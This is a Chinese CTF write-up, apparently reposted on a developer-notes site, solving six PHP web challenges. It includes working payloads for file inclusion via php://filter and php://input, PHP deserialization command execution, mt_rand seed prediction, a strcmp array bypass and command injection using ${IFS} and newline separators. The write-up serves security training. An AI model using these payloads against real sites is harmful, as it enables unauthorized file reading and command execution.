热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

夺旗赛满屏的php代码,i春秋ctf夺旗赛(第四季)writeup——web

前言:这次的比赛一共有六道web题,接下我会详细介绍解题的步骤以及思路,以便让小白和没有接触过这类题型的小伙伴们能读懂。第一题࿰

前言:

这次的比赛一共有六道web题,接下我会详细介绍解题的步骤以及思路,以便让小白和没有接触过这类题型的小伙伴们能读懂。

第一题,nani

1、打开网页啥都没有,内容一片空白啥。这时候我们应该按F12去查看网页源码。往往很多提示和关键性信息都藏在这里。如图所示:

af1e850d1e22

在这里插入图片描述

2、得到提示:./index.php?file=show.php ;看到关键字file,下意识想会不会存在文件包含呢?不急,我们先去访问一下这个链接。如图所示:

af1e850d1e22

在这里插入图片描述

3、得知user.php的提示,我们接着再去访问user.php会发现又得到空白页面。不急,我们回头研究一下./index.php?file=show.php,检测是否存在文件包含漏洞。

构造一下payload:

/index.php?file=php://filter/read=convert.base64-encode/resource=user.php

af1e850d1e22

在这里插入图片描述

4、成功返回了base64加密后user.php的源代码,说明思路是正确的,我们继续往下走。

base64解密后得到如下代码:

af1e850d1e22

在这里插入图片描述

5、开始代码审计,主要有两个要注意的地方,wakeup()函数和unserialize()函数。之所以关注他们,是因为这两个函数在一起容易引发__wakeup()函数漏洞。构造payload:cmd=O:7:“convent”:3:{s:4:“warn”;s:13:“system(“ls”);”;}

解释一下payload吧:

传入的参数是cmd,是post类型的;

O:后面的数字7表示类"convent"的长度

3:表示的是错误的变量的数量

s: 表示的是字符串的长度

6、在hackbar执行构造好的payload:

af1e850d1e22

在这里插入图片描述

7、成功执行了ls命令,返回了目录信息。所以我们用同样的方法构造payload得到flag

af1e850d1e22

在这里插入图片描述

第二题,random

af1e850d1e22

在这里插入图片描述

1、代码审计后,可以知道代码可以传入三个参数:hello,seed,key;

hello参数作用:调用文件flag.php;

seed参数的作用:为mt_scrand()函数选定种子。种子确定了,mt_rand()就可以生成相应的随机数了。

key参数作用:传入的值要等于mt_rand()生成后的随机数。

2、可以利用php伪随机数漏洞,我们通过如下编写脚本:

af1e850d1e22

在这里插入图片描述

3、通过这几行代码就可以把我们选定的种子数(123456)对应的随机数打印出来,然后就可以构造我们payload了。(提醒一下小白,php文件可以放到我们的虚拟机的靶机服务器,然后去访问它就会输出结果了。。。)

4、访问网页得到:1863022934

af1e850d1e22

在这里插入图片描述

5、构造payload:/?hello=file(‘flag.php’)&seed=123456&key=1863022934

得到flag:

af1e850d1e22

在这里插入图片描述

第三题,admin

af1e850d1e22

在这里插入图片描述

1、网页显示的内容说我们不是管理员,打开F12查看源码:

af1e850d1e22

在这里插入图片描述

2、我们代码审计一下这段代码的意思:

$user = $_GET["user"];

$file = $_GET["file"];

$pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="admin")){

echo "hello admin!
";

include($file); //class.php

}

else{

echo "you are not admin ! ";

}

isset()函数:就是判断变量是否存在并且不为空,存在返回ture,不存在返回false。

file_get_contents() 函数:是用于将文件的内容读入到一个字符串中的首选方法。

include($file); //class.php:

3、意思是让我们输出hello admin!,然后执行文件包含漏洞。

所以,我们应该想办法让file_get_contents($user,‘r’)的内容变成admin就可以绕过file_get_contents,这里用的方法是使用php的封装协议—— php://input。php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。

4、构造payload:/?User=php://input

af1e850d1e22

在这里插入图片描述

5、成功绕过后我们利用伪协议php://filter把class.php文件读出来

af1e850d1e22

在这里插入图片描述

class.php:

error_reporting(E_ALL & ~E_NOTICE);

class Read{//fffffflag.php

public $file;

public function __toString(){

if(isset($this->file)){

echo file_get_contents($this->file);

}

return "Awwwwwwwwwww man";

}

}

?>

6、代码审计:

暗示我们存在fffffflag.php ;__toString()函数:将Flag类作为字符串执行时会自动执行此函数,并且将变量$file作为文件名输出文件内容,也就是说存在文件包含漏洞;虽然定义了类Read可是在这里显然没有去调用它,而且还有一个变量pass没使用过。因此,猜测第一网页的源码可能有信息。

同理,构造payload返回index.php

af1e850d1e22

在这里插入图片描述

index.php:

error_reporting(E_ALL & ~E_NOTICE);

$user = $_GET["user"];

$file = $_GET["file"];

$pass = $_GET["pass"];

if(isset($user)&&(file_get_contents($user,'r')==="admin")){

echo "hello admin!
";

if(preg_match("/fffffflag/",$file)){

exit();

}else{

include($file); //class.php

$pass = unserialize($pass);

echo $pass;

}

}else{

echo "you are not admin ! ";

echo "
";

echo "hava a rest and then change your choose.";

}

?>

7、代码审计:

preg_match("/fffffflag/",

math?formula=file)%EF%BC%9A%E5%AF%B9file%E8%BF%9B%E8%A1%8C%E6%AD%A3%E5%88%99%E5%8C%B9%E9%85%8D%EF%BC%9B pass = unserialize($pass);:这里对pass进行了反序列化处理;

那可以构造反序列化让它输出pass,利用伪协议php://filter 读取fffffflag.php的内容。

af1e850d1e22

在这里插入图片描述

得到:flag{woyebuzhidaoyaononggeshaflagheshia}

第四题,post1

af1e850d1e22

在这里插入图片描述

1、查看源码得到:eval(system($c));//read flag.txt But no cat!!!

意思是存在flag.txt

2、题目说post[a],那我们post提交a试试:

af1e850d1e22

在这里插入图片描述

3、看来方向是对的,因为至少它页面的东西变了。那应该怎么构造才会读取到文件呢?eval(system());成为了我们突破口,system()允许我们使用命令,再根据“no cat”提示,用到的命令很可能是cut。所以构造payload:a=cut${IFS}-b1-${IFS}flag.txt

解释一下:

原本是:a=cut -b1- flag.txt

但是这里过滤空格啦,所以用$ {IFS }代替空格就完事了。

cut -b1 flag.txt 只会返回整个文本的第一个字符串f,所以加 - 是为了可以遍历全部的内容

af1e850d1e22

在这里插入图片描述

第五题,ping

1、直接查看网页源代码:

af1e850d1e22

在这里插入图片描述

2、代码审计:

strcmp ():进行二进制安全字符串比较,用来判断password是否一致

include($_REQUEST[‘path’]):文件包含,传入的参数是path

意思是我们要绕过strcmp (),然后再执行文件包含读ping.php这个文件。

3、Php5.3之后版本使用strcmp比较一个字符串和数组的话,将不再返回-1而是返回0。所以构造如下:

af1e850d1e22

在这里插入图片描述

4、利用伪协议php://filter读取ping.php

af1e850d1e22

在这里插入图片描述

ping.php源码:

af1e850d1e22

在这里插入图片描述

5、、审计代码后,我们知道对基本的命令分隔符进行了过滤。但是我们还可以使用 %0a符号–换行符;%0d符号–回车符

af1e850d1e22

在这里插入图片描述

6、命令:cat ./ffffff1111aagggg.txt,读取flag

第六题,post2

1、基于post1进行改进,刚开始做题的时候可绕了因为exec没有回显,要用到时间盲注。后来看到大佬写的脚本才恍然大悟,利用大佬给出的脚本:

af1e850d1e22

在这里插入图片描述

af1e850d1e22

在这里插入图片描述

End:

其实这次比赛的web题,考察最多就是php伪协议,用到最多的技能就是代码审计的能力和编写脚本的能力。所以要熟悉php脚本语言,以及提高python代码编写的能力。不断积累题型,才能玩得越来越好。



推荐阅读
  • 本文介绍了南邮ctf-web的writeup,包括签到题和md5 collision。在CTF比赛和渗透测试中,可以通过查看源代码、代码注释、页面隐藏元素、超链接和HTTP响应头部来寻找flag或提示信息。利用PHP弱类型,可以发现md5('QNKCDZO')='0e830400451993494058024219903391'和md5('240610708')='0e462097431906509019562988736854'。 ... [详细]
  • PHP图片截取方法及应用实例
    本文介绍了使用PHP动态切割JPEG图片的方法,并提供了应用实例,包括截取视频图、提取文章内容中的图片地址、裁切图片等问题。详细介绍了相关的PHP函数和参数的使用,以及图片切割的具体步骤。同时,还提供了一些注意事项和优化建议。通过本文的学习,读者可以掌握PHP图片截取的技巧,实现自己的需求。 ... [详细]
  • 本文介绍了Python高级网络编程及TCP/IP协议簇的OSI七层模型。首先简单介绍了七层模型的各层及其封装解封装过程。然后讨论了程序开发中涉及到的网络通信内容,主要包括TCP协议、UDP协议和IPV4协议。最后还介绍了socket编程、聊天socket实现、远程执行命令、上传文件、socketserver及其源码分析等相关内容。 ... [详细]
  • 基于layUI的图片上传前预览功能的2种实现方式
    本文介绍了基于layUI的图片上传前预览功能的两种实现方式:一种是使用blob+FileReader,另一种是使用layUI自带的参数。通过选择文件后点击文件名,在页面中间弹窗内预览图片。其中,layUI自带的参数实现了图片预览功能。该功能依赖于layUI的上传模块,并使用了blob和FileReader来读取本地文件并获取图像的base64编码。点击文件名时会执行See()函数。摘要长度为169字。 ... [详细]
  • 这是原文链接:sendingformdata许多情况下,我们使用表单发送数据到服务器。服务器处理数据并返回响应给用户。这看起来很简单,但是 ... [详细]
  • Java序列化对象传给PHP的方法及原理解析
    本文介绍了Java序列化对象传给PHP的方法及原理,包括Java对象传递的方式、序列化的方式、PHP中的序列化用法介绍、Java是否能反序列化PHP的数据、Java序列化的原理以及解决Java序列化中的问题。同时还解释了序列化的概念和作用,以及代码执行序列化所需要的权限。最后指出,序列化会将对象实例的所有字段都进行序列化,使得数据能够被表示为实例的序列化数据,但只有能够解释该格式的代码才能够确定数据的内容。 ... [详细]
  • 如何使用Java获取服务器硬件信息和磁盘负载率
    本文介绍了使用Java编程语言获取服务器硬件信息和磁盘负载率的方法。首先在远程服务器上搭建一个支持服务端语言的HTTP服务,并获取服务器的磁盘信息,并将结果输出。然后在本地使用JS编写一个AJAX脚本,远程请求服务端的程序,得到结果并展示给用户。其中还介绍了如何提取硬盘序列号的方法。 ... [详细]
  • [译]技术公司十年经验的职场生涯回顾
    本文是一位在技术公司工作十年的职场人士对自己职业生涯的总结回顾。她的职业规划与众不同,令人深思又有趣。其中涉及到的内容有机器学习、创新创业以及引用了女性主义者在TED演讲中的部分讲义。文章表达了对职业生涯的愿望和希望,认为人类有能力不断改善自己。 ... [详细]
  • ZSI.generate.Wsdl2PythonError: unsupported local simpleType restriction ... [详细]
  • http:my.oschina.netleejun2005blog136820刚看到群里又有同学在说HTTP协议下的Get请求参数长度是有大小限制的,最大不能超过XX ... [详细]
  • 也就是|小窗_卷积的特征提取与参数计算
    篇首语:本文由编程笔记#小编为大家整理,主要介绍了卷积的特征提取与参数计算相关的知识,希望对你有一定的参考价值。Dense和Conv2D根本区别在于,Den ... [详细]
  • 成功安装Sabayon Linux在thinkpad X60上的经验分享
    本文分享了作者在国庆期间在thinkpad X60上成功安装Sabayon Linux的经验。通过修改CHOST和执行emerge命令,作者顺利完成了安装过程。Sabayon Linux是一个基于Gentoo Linux的发行版,可以将电脑快速转变为一个功能强大的系统。除了作为一个live DVD使用外,Sabayon Linux还可以被安装在硬盘上,方便用户使用。 ... [详细]
  • 如何自行分析定位SAP BSP错误
    The“BSPtag”Imentionedintheblogtitlemeansforexamplethetagchtmlb:configCelleratorbelowwhichi ... [详细]
  • 基于PgpoolII的PostgreSQL集群安装与配置教程
    本文介绍了基于PgpoolII的PostgreSQL集群的安装与配置教程。Pgpool-II是一个位于PostgreSQL服务器和PostgreSQL数据库客户端之间的中间件,提供了连接池、复制、负载均衡、缓存、看门狗、限制链接等功能,可以用于搭建高可用的PostgreSQL集群。文章详细介绍了通过yum安装Pgpool-II的步骤,并提供了相关的官方参考地址。 ... [详细]
  • 本文讨论了在Spring 3.1中,数据源未能自动连接到@Configuration类的错误原因,并提供了解决方法。作者发现了错误的原因,并在代码中手动定义了PersistenceAnnotationBeanPostProcessor。作者删除了该定义后,问题得到解决。此外,作者还指出了默认的PersistenceAnnotationBeanPostProcessor的注册方式,并提供了自定义该bean定义的方法。 ... [详细]
author-avatar
jiazi---
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有